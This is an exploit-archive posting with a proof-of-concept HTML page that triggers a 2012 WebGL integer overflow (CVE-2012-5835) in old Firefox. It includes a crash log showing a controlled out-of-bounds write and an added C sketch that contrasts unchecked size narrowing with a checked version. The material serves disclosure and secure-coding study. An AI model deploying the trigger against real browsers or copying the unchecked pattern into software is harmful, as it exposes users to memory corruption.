
Mozilla Firefox WebGL Proof Of Concept

Posted Feb 15, 2017
Authored by Bikash Dash

Proof of concept code demonstrating a WebGL integer overflow from 2012 in Mozilla Firefox versions prior to 17 and ESR 10.x versions before 10.0.11.

tags | exploit, overflow, proof of concept
advisories | CVE-2012-5835
SHA-256 | 007ca774585a830b71b08631a7e5718fc0eb3a94767134d2128687b2e2c600e5

# Exploit Title: Integer overflow in the WebGL system in Mozilla Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: (Originally found by Google Project 0 team) Bikash Dash
# Tested On: Mac OS x86
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: webapps (Mozilla)
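<html>
<head>
<script>
// Create a WebGL context and bind a fresh array buffer.
var gl = document.createElement('canvas').getContext('experimental-webgl');
var buf = gl.createBuffer();
gl.bindBuffer(gl.ARRAY_BUFFER, buf);
// Offset used below; it reappears as the faulting address in the crash report.
var magic = 0x12345678;
// Give the buffer magic+1 bytes of storage.
gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW);
// Re-specify the buffer with a size of 2^32, which does not fit in 32 bits.
gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW);
// Write one byte at offset magic.
gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1));
</script>
</head>
</html>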
Crash Information:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address. Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html


Process: firefox [3732]
Path: /Applications/Firefox.app/Contents/MacOS/firefox
Identifier: firefox
Version: ??? (???)
Code Type: X86-64 (Native)
Parent Process: exc_handler [3731]

Date/Time: 2017-02-15 10:44:52.818 +0300
OS Version: Mac OS X 10.8.1 (12B19)
Report Version: 9

Crashed Thread: 0 Dispatch queue: com.apple.main-thread

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_c.dylib 0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1 GLEngine 0x000000010cfa9982 glBufferSubData_Exec + 856
2 XUL 0x00000001020df955 0x10111a000 + 16537941
3 XUL 0x000000010257424b 0x10111a000 + 21340747
4 XUL 0x0000000102564622 0x10111a000 + 21276194
5 XUL 0x0000000102573ae2 0x10111a000 + 21338850
6 XUL 0x0000000102573ce9 0x10111a000 + 21339369
7 XUL 0x0000000102573fe5 0x10111a000 + 21340133
8 XUL 0x00000001024f2d2d 0x10111a000 + 20811053
9 XUL 0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10 XUL 0x000000010182121d 0x10111a000 + 7369245
11 XUL 0x00000001015ef000 0x10111a000 + 5066752
12 XUL 0x00000001015f0538 0x10111a000 + 5072184
13 XUL 0x00000001015f117a 0x10111a000 + 5075322
14 XUL 0x00000001015ee4bd 0x10111a000 + 5063869
15 XUL 0x00000001019a41b6 0x10111a000 + 8954294
16 XUL 0x00000001019a6285 0x10111a000 + 8962693
17 XUL 0x00000001019aa94d 0x10111a000 + 8980813
18 XUL 0x00000001021324f3 0x10111a000 + 16876787
19 XUL 0x00000001020f1c0e 0x10111a000 + 16612366
20 XUL 0x0000000101f5b009 0x10111a000 + 14946313
21 XUL 0x0000000101f1f4bf 0x10111a000 + 14701759
22 com.apple.CoreFoundation 0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23 com.apple.CoreFoundation 0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24 com.apple.CoreFoundation 0x00007fff918204e5 __CFRunLoopRun + 789
25 com.apple.CoreFoundation 0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26 com.apple.HIToolbox 0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27 com.apple.HIToolbox 0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28 com.apple.HIToolbox 0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29 com.apple.AppKit 0x00007fff96591fa3 _DPSNextEvent + 685
30 com.apple.AppKit 0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31 XUL 0x0000000101f1e942 0x10111a000 + 14698818
32 com.apple.AppKit 0x00007fff96588c03 -[NSApplication run] + 517
33 XUL 0x0000000101f1ed2d 0x10111a000 + 14699821
34 XUL 0x0000000101d867b4 0x10111a000 + 13027252
35 XUL 0x0000000101121193 0x10111a000 + 29075
36 XUL 0x0000000101125fbb 0x10111a000 + 49083
37 XUL 0x00000001011264c3 XRE_main + 307
38 org.mozilla.firefox 0x0000000100001e15 0x100000000 + 7701
39 org.mozilla.firefox 0x0000000100001584 start + 52

Thread 0 crashed with X86 Thread State (64-bit):
rax: 0xffffffff0b4f3400 rbx: 0x000000011506ac00 rcx: 0x0000000000000000 rdx: 0x0000000000000001
rdi: 0x0000000012345678 rsi: 0x0000000106e521d1 rbp: 0x00007fff5fbfb9d0 rsp: 0x00007fff5fbfb9d0
r8: 0x0000000000000000 r9: 0x00007fff5fbfb970 r10: 0x000000010a50c5b0 r11: 0x0000000012345678
r12: 0x0000000012345678 r13: 0x0000000113607b68 r14: 0x0000000113607b40 r15: 0x0000000000000001
rip: 0x00007fff92c82a41 rfl: 0x0000000000010206 cr2: 0x0000000012345678
Logical CPU: 2
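
The size-narrowing pattern behind this class of bug, next to a checked version, as an added example (not code from the original post, from Firefox, or from any GL driver). The model_buffer struct and all function names are hypothetical, and the model assumes the oversized bufferData size is narrowed to 32 bits before allocation; that is consistent with the write at 0x12345678 in the crash report but is not confirmed by the page.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of a GL buffer object (not Firefox or driver code). */
typedef struct {
    uint8_t *data;      /* backing store */
    uint64_t allocated; /* bytes really allocated */
    uint64_t tracked;   /* length the validation layer trusts */
} model_buffer;

/* Weak pattern: size is narrowed to 32 bits for the allocation while the
 * un-narrowed value is recorded for later bounds checks. */
static void buffer_data_unchecked(model_buffer *b, int64_t size) {
    uint32_t narrowed = (uint32_t)size;          /* 2^32 becomes 0 */
    free(b->data);
    b->data = narrowed ? calloc(narrowed, 1) : NULL;
    b->allocated = b->data ? narrowed : 0;
    b->tracked = (uint64_t)size;
}

/* Hardened pattern: reject sizes the narrower type cannot represent and
 * record only what was really allocated. Returns 0 on success. */
static int buffer_data_checked(model_buffer *b, int64_t size) {
    if (size < 0 || (uint64_t)size > UINT32_MAX) return -1;
    uint8_t *p = size ? calloc((size_t)size, 1) : NULL;
    if (size && !p) return -1;                   /* keep old state on OOM */
    free(b->data);
    b->data = p;
    b->allocated = b->tracked = (uint64_t)size;
    return 0;
}

/* Bounds check written so that offset + len cannot wrap. */
static int range_ok(uint64_t limit, uint64_t offset, uint64_t len) {
    return len <= limit && offset <= limit - len;
}

/* Sub-data write that validates against the real allocation. */
static int buffer_sub_data(model_buffer *b, uint64_t offset,
                           const void *src, uint64_t len) {
    if (!range_ok(b->allocated, offset, len)) return -1;
    if (len) memcpy(b->data + offset, src, (size_t)len);
    return 0;
}
```

In the unchecked path a range check against the tracked length accepts offset 0x12345678 even though nothing is allocated; validating against the real allocation, or rejecting the size up front, closes that gap.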